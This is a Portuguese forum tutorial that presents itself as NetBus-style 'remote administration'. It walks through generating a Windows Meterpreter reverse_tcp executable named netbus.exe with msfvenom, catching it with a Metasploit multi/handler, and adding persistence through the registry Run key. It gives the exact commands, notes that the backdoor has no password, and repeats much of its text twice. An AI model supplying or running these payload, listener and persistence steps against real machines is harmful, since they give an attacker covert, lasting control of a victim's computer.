Criando netbus via console do Linux + Metasploit
Posted: 25 Feb 2018, 23:06
Em 1999 , a saudosa época do ICQ , era muito comum as pessoas instalarem o tal programa NETbus em máquinas que precisavam ser administradas remotamente, esse programa tinha várias funções como trancar o mouse, abrir porta do drive de cd, reiniciar e passar alguns comandos. Muito útil ao administrador de máquinas.
Hoje, 19 anos depois, eu irei mostrar como fazer algo parecido pelo saudoso console do Linux. Você irá criar um executável no console do Linux e poderá rodá-lo em uma máquina Windows que deseja administrar. Fique tranquilo pois o padrão binário do executável não será elf mas sim MZ(exe).
É preciso que você tenha o Metasploit instalado em sua máquina , alguns bobões que só usam Linux para brincar de máquina virtual gostam de usar o kali linux pois nele esse programa já vem pré instalado. É importante ressaltar aos bobocas que nem Linux usam que esse e outros programas podem ser instalados na sua distribuição predileta de Linux, não só a Kali embora nessa as coisas sejam mais mastigadas.
Você irá executar no console(terminal ou ctr+alt+f3) um comando onde o IP e a Porta da máquina a ser administrada será por conta sua:
O comando acima irá criar um executável administrativo na pastinha /tmp/ do seu Linux , ele irá se chamar netbus.exe , o IP e a porta que eu coloquei acima são fictícios, você pode mudar para o ip e porta do servidor seu porem eu devo lembrar que a porta 12345 era do netbus mesmo.
Leve o netbus.exe para o seu servidor a ser administrado e o rode lá, pronto, ele poderá ser administrado por você para testes, afinal ele não esta protegido por senha, lembre-se disso!
Bom, agora iremos administrar o servidor 198.185.159.144 , para isso, no console digite
Depois coloque passo a passo as linhas que eu irei exibir, dentro do prompt do metasploit (msf >) , os comandos abaixo só irão ter êxito se já estiver rodando o netbus.exe no nosso servidor sem nenhum firewall que bloqueie essa porta.
Apos ter rodado o comando acima, se você tiver sucesso, estará conectado ao host do exemplo, no caso o 198.185.159.144
Para saber os comandos que você pode usar para administrar o host remoto, você poderá usar o comando help.
Mas ainda falta fazer o netbus ser executado sempre , para isso, colocaremos um comando que fará o nosso executavel entrar na chave run do registro do windows
Se você quiser ler os valores de um registro, você usar o exemplo abaixo no prompt do meta
claro, as chaves são fictícias.
Agora para eu colocar um valor no regedit eu uso
nesse caso eu fiz a variável Es_vadia valer 1
Lembre, o servidor precisa estar na mesma rede que a sua se não você terá problema de NAT e redirecionamento de portas para alcançá-lo, embora não seja impossível. Você pode usar outras portas se quiser, mas como o tutorial é em homenagem ao netbus, eu escolhi a porta 12345.
Explore o help, ele irá dar várias opções para você explorar como administrador do sistema.
Hoje, 19 anos depois, eu irei mostrar como fazer algo parecido pelo saudoso console do Linux. Você irá criar um executável no console do Linux e poderá rodá-lo em uma máquina Windows que deseja administrar. Fique tranquilo pois o padrão binário do executável não será elf mas sim MZ(exe).
É preciso que você tenha o Metasploit instalado em sua máquina , alguns bobões que só usam Linux para brincar de máquina virtual gostam de usar o kali linux pois nele esse programa já vem pré instalado. É importante ressaltar aos bobocas que nem Linux usam que esse e outros programas podem ser instalados na sua distribuição predileta de Linux, não só a Kali embora nessa as coisas sejam mais mastigadas.
Você irá executar no console(terminal ou ctr+alt+f3) um comando onde o IP e a Porta da máquina a ser administrada será por conta sua:
Code: Select all
msfvenom LHOST=198.185.159.144 LPORT=12345 -f exe -o /tmp/netbus.exe -p windows/meterpreter/reverse_tcp --platform windows -a x86
Leve o netbus.exe para o seu servidor a ser administrado e o rode lá, pronto, ele poderá ser administrado por você para testes, afinal ele não esta protegido por senha, lembre-se disso!
Bom, agora iremos administrar o servidor 198.185.159.144 , para isso, no console digite
Code: Select all
msfconsole
Code: Select all
use exploit/multi/handler
Code: Select all
set PAYLOAD windows/meterpreter/reverse_tcp
Code: Select all
set RHOST 198.185.159.144
Code: Select all
set RPORT 12345
Code: Select all
exploit
Para saber os comandos que você pode usar para administrar o host remoto, você poderá usar o comando help.
Mas ainda falta fazer o netbus ser executado sempre , para isso, colocaremos um comando que fará o nosso executavel entrar na chave run do registro do windows
Code: Select all
run persistence -A -X -i 60 -p 12345 -f 198.185.159.144
Code: Select all
reg queryval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentVersion\Blabla\curola"
Agora para eu colocar um valor no regedit eu uso
Code: Select all
reg setval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentVersion\Blabla" -v Es_vadia -t REG_DWORD -d 1
Lembre, o servidor precisa estar na mesma rede que a sua se não você terá problema de NAT e redirecionamento de portas para alcançá-lo, embora não seja impossível. Você pode usar outras portas se quiser, mas como o tutorial é em homenagem ao netbus, eu escolhi a porta 12345.
Explore o help, ele irá dar várias opções para você explorar como administrador do sistema.
Code: Select all
help